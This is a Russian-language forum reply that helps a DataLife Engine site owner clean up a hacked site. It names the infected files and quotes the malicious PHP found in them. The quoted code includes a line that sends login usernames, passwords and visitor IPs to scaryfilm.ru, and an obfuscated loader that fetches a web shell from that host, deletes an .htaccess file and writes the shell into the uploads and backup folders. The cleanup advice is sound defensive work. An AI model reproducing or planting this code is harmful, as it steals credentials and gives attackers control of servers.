Идите от установленных модулей на ДЛЕ. пример с какого модуля грузится я написал выше.
Или стучите в асю поможем чем сможем.
Удаляйте код из файлов:
admin.php
\engine\classes\flashplayer\media_player.php (ВАЩЕ левый)
\engine\classes\js\jquery.js
\engine\init.php
что то типа такого:
file_get_contents("http://scaryfilm.ru/1.php?url=".$_SERVER["HTTP_HOST"].":".$_POST['username'].":".$_POST['password'].":".$_SERVER['REMOTE_ADDR']);
А еще лучше сливайте полностью сайт себе, и сделайте в нем поиск на строку "scaryfilm.ru"
Ищите фтп шелл... скорее всего он в одном из установленных модулей, например videovk_mod.
Там есть такое... сносите к чертям!
$fdsfsdfsdfsd = file_get_contents('h'.'t'.'t'.'p'.':'.'//'.'s'.'c'.'a'.'r'.'y'.'f'.'i'.'l'.'m'.'.'.'ru'.'/get.'.'p'.'hp'.'?url='.$_SERVER['HTTP_HOST']).unlink(ROOT_DIR.'/'.'u'.'p'.'l'.'o'.'a'.'d'.'s'.'/.htaccess'); file_put_contents(ROOT_DIR.'/'.'b'.'a'.'c'.'k'.'u'.'p'.'/pe'.'op'.'le'.'.p'.'hp', str_replace('fghfgh544ty', '?>', str_replace('fgfvsdffvsdvsd', '<?', $fdsfsdfsdfsd))); file_put_contents(ROOT_DIR.'/'.'u'.'p'.'l'.'o'.'a'.'d'.'s'.'/'.'f'.'ot'.'os'.'/pe'.'op'.'le'.'.p'.'hp', str_replace('fghfgh544ty', '?>', str_replace('fgfvsdffvsdvsd', '<?', $fdsfsdfsdfsd)));
Как видно шел грузится в uploads/fotos/people.php
А далее обходите все файлы движка и смотрите какие изменения были внесены.
